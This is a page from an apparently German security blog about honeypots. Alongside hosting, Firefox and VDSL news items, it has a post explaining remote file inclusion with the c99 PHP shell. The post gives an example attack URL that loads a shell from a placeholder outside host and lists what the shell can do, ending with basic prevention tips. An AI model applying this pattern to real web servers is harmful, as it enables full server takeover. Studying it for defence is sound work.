BotNetzProvider.de Ein Security Blog über Honig-Töpfe (honeypots) und Bots

9Mrz/090

VServer Betatest – Kostenloser vServer bei EUserv.de

EUserv möchte künftig seine Produktpalette um virtuelle Server erweitern und bietet deshalb einen kostenlosen Betatest an.

Alle Teilnehmer gehen keine vertragliche Verpflichtungen ein - der Test ist kostenlos, unverbindlich und jederzeit kündbar.

Gutschein-Code:

i7g5$fEm

Dieser Bestell-Code muss im entsprechenden Feld auf der EUserv Bestell- und Informationsseite zum vServer-Betatest eingegeben werden.

Technische Spezifikation der Betatest-vServer:

* OpenVZ Servervirtualisierungslösung
* CPU-Leistung 100%
* Arbeitsspeicher: (garantiert) 512 MB RAM
* Arbeitsspeicher: (dynamisch) 1024 MB RAM
* Festplatte: 10 GB Speicherplatz
* Netzwerkanbindung 1x 100 Mbit/s (shared über Hostsystem)
* Bandbreite 100 Mbit/s (shared über Hostsystem)
* Traffic inklusive
* 1 feste IP-Adresse

Dienstleistungen:

* 24×7 Reset über Webinterface
* 24×7 Reinstall über Webinterface
* 24×7 Betriebsystemwechsel über Webinterface (sobald mehrere OS verfügbar sind)

Nicht erlaubte Dienste:

* TOR / Proxy oder andere Anonymisierungsdienste
* IRC-Server und -Bouncer
* Distributed Computing (SETI-Client usw.)
* OTR, Filesharing, Content-Mirrors

EUserv unterstützt alle Tester im EUserv Forum mit allen Informationen zum Testprodukt und kostenlosen Upgrades.

Link zum Angebot: https://ssl.euserv.de/produkte/vserver/betatest.php

7Mrz/090

Update: Neuer Firefox 3.0.7 erschienen

Die neuen Versionen aus dem Hause Mozilla. Es handelt sich um den Firefox 3.0.7, den Nachfolger der wenige Tage alten 3.0.6!

Wer aber  Änderungen oder Neuerungen sucht, der sucht wohl vergebens, denn es handelt sich wohl ausschließlich um Sicherheitsupdates.

Die bisher veröffentlichten Lücken, die unmittelbar beim Erscheinen der Vorgängerversionen bekannt wurden, sind nun geschlossen. Dennoch gibt es kleinere Probleme, die jedoch laut Mozilla nicht ausgenutzt werden können.

Bitte die neue Versione alsbald aufspielen, da die Lücken demnöchst schon bekannt sind und nach Veröffentlichung der Sicherheitsupdates, auch rege ausgenutzt werden könnten!

Im FF 3.0.7 wurden wieder zahlreiche Problem gefixt. Es gibt im Übrigen etxra Versionen für Windows, Linux und den Mac!

Die automatische Updatefunktion geht noch nicht überall, da die deutschen Server teilweise noch die alten Versionen beinhalten! Bitte warten, meist geht es 24 Stunden nach Erscheinen der Neuversion...

Download vom Server

4Mrz/090

VDSL für alle

Die Telekom gibt nach: Ihr milliardenteures Glasfaser-Datennetz dürfen künftig auch Wettbewerber nutzen. Damit steht dem Highspeed-Ausbau endlich nichts mehr im Weg. Ganz freiwillig dürfte dieser Schritt allerdings nicht kommen.

Hannover - Die Deutsche Telekom öffnet ihr VDSL-Hochgeschwindigkeitsnetz für die Konkurrenz. "Wir öffnen unser VDSL-Netz freiwillig für unsere Wettbewerber", kündigte der scheidende Chef der Internet- und Festnetzsparte, Timotheus Höttges, in einem Gespräch im Vorfeld der Branchenmesse Cebit in Hannover an. Wettbewerber, die dieses Angebot wahrnehmen, sollen für steigende Kundenzahlen mit sinkenden Preisen belohnt werden.

Zudem kündigte Höttges an, dass die Telekom die Tarife für ihr Internet-TV-Angebot (IPTV) Entertain senken werde, um mehr eigene Kunden für VDSL zu gewinnen. Der Konzern will mit diesen Schritten die milliardenteure Infrastruktur besser auslasten und den Umsatz der Internet- und Festnetzsparte wieder steigern.

Das auf Glasfaserleitungen basierende VDSL-Netz der Telekom bietet mit 50 Megabit pro Sekunde wesentlich höhere Übertragungsraten als die bisherigen DSL-Verbindungen, die mit ihren Kupferkabeln nur auf 16 Megabit kommen. VDSL-Verfechter argumentieren, dass Internet-Fernsehen in HD-Auslösung nur per VDSL zuverlässig funktioniere, insbesondere bei steigenden Nutzerzahlen. Zudem sei VDSL Voraussetzung für neue Dienste wie Arztkonsultationen über den Computer.

Monatlich angepasste Preise

Wettbewerber hatten schon lange einen Zugang zum VDSL-Netz gefordert. Die Bundesnetzagentur hatte den Bonner Konzern bislang jedoch nur dazu verpflichtet, den Konkurrenten Zugang zu seinen Leerrohren zu gewähren, damit diese dort selbst mit Glasfaser aufrüsten können. Diese Regelung war den Wettbewerbshütern der Europäischen Kommission sauer aufgestoßen. Sie sehen in der der deutschen Sonderregelung einen Verstoß gegen EU-Recht und verklagten Deutschland vor dem Europäischen Gerichtshof.

Nun sollen an VDSL interessierte Konkurrenten ein Angebot für die Nutzung von Telefon- und Internet-Diensten von der Telekom erhalten, das sie dann an ihre Endkunden weiterreichen können. "Ein Festnetzanschluss der Telekom ist also nicht nötig", sagte Höttges. "Wir führen Gespräche mit Vodafone und 1&1. Verträge sind aber noch nicht unterzeichnet."

"Wir planen eine monatliche Preisanpassung auf Basis der Netzauslastung. Der neue Preis gilt dann für alle Vertragspartner unabhängig davon, wie viele Leitungen sie gemietet haben", kündigte Höttges an. "Bei heutiger Auslastung liegt der Preis bei rund 30 Euro." Bei langfristiger Bindung und einer Vorabzahlung werde die monatliche Gebühr zudem günstiger.

Mehr Bandbreite für alle

Die Telekom legte das Modell der Bundesnetzagentur vor. Es soll zunächst für das VDSL-Netz des Konzerns gelten, das in den 50 größten deutschen Städten ausgebaut ist und potentiell 9,6 Millionen Haushalte erreicht. Für den weiteren Ausbau sucht die Telekom nach Möglichkeiten der Zusammenarbeit, um die Kosten für den Ausbau in anderen - auch weniger lukrativen - Kommunen im Rahmen zu halten. "Der Vertrag mit Vodafone ist unterschrieben, mit M-net und anderen führen wir Verhandlungen", sagte Höttges.

Kunden will der Bonner Konzern auch über sein Unterhaltungsangebot auf das Netz locken. Die Zahl der Entertainment-Kunden liegt derzeit bei über 500.000, nicht alle jedoch nutzen VDSL. "Wir erweitern das Unterhaltungsangebot für unsere Kunden und werden die monatlichen Preise für alle Tarife senken", kündigte Höttges an. Der monatliche Preis für Telefon, Internet und Unterhaltung über VDSL liegt derzeit bei 54,95 Euro. "Wir wollen bis zum Jahresende eine Million Kunden für unsere Entertainment-Pakete haben und die Kabelanbieter angreifen", sagte Höttges. "Unser Ziel ist es, mit mehr Bandbreite und besserem Service den Umsatz zu steigern beziehungsweise zu halten."

spiegel.de

veröffentlicht unter: Allgemein keine Kommentare
3Mrz/090

Wöchentliche RFI Patterns

Hier findet ihr immer die neusten RFI Patterns, direkt von meinen Honeypots.
Diese werden immer nach 7 Tagen aktualisiert, falls ich dazu komme. Leider fehlt mir noch ein Script welches diesen Schritt automatisiert.

Wenn ich dazukomme, werde ich Euch meinen eigenen RFI Scanner zur Verfügung stellen.
Mit diesem Scanner könnt Ihr dann Eure eigenen Webseiten auf Sicherheitslücken testen.

2Mrz/090

Webserver Hacken (remote file inclusion) c99

Remote File Inclusion - c99 php shell

Ich denke mal nicht das ich noch groß über das Thema sprechen muss, was genau eine Remote File Inclusion ist.
Für alle die sich damit noch nicht auskennen sollten Wikipedia.de hat einen kurzen Artikel darüber HIER

Daher will ich mich heute mit der wohl am bekanntesten "PHP SHELL" (c99) *beschäftigen.
Es ist natürlich verständlich, dass ich den Quellcode der c99 PHP Shell ein wenig bearbeiten musste, damit man diese
nicht sofort benutzen kann.

Zunächst einmal ist zu sagen, diese Shell muss nicht unbedingt auf dem eigenen Webserver liegen um genutzt zu werden.
Es reicht wenn diese auf einem anderen Webserver in reiner Textform abgelegt ist.

Ein klassisches Angriffsmuster sieht wie folgt aus:

http://der.zu.hackende.server.de/ungeschütze.variable.php?variable=http://pfad.zur.phpShell.de/c99

Wenn dieser Angriff erfolgreich war, wird folgendes Angezeigt: (Beispiel)

Mit dieser nun integrierten Shell, kann man nun den gesamten Webserver steuern.

Folgendes ist mit diesem Tool möglich:

  • FTP-Upload
  • Brute Force Attacken
  • Upload Files
  • SQL
  • Webserver Informationen anzeigen

Wie kann ich dem ganzen vorbeugen:

1. Halten Sie Ihren Server und die Software (Joomla,etc) immer auf dem aktuellsten Stand.
2. Überprüfen Sie öfters die Webserver Logdateien auf ungewöhnliche Einträge.

*leider musste ich die modifizierte Shell offline nehmen. Wurde bei einigen AntiViren Hersteller "blacklisted" :)

  • Page 2 of 2
  • <
  • 1
  • 2
/* google like button API */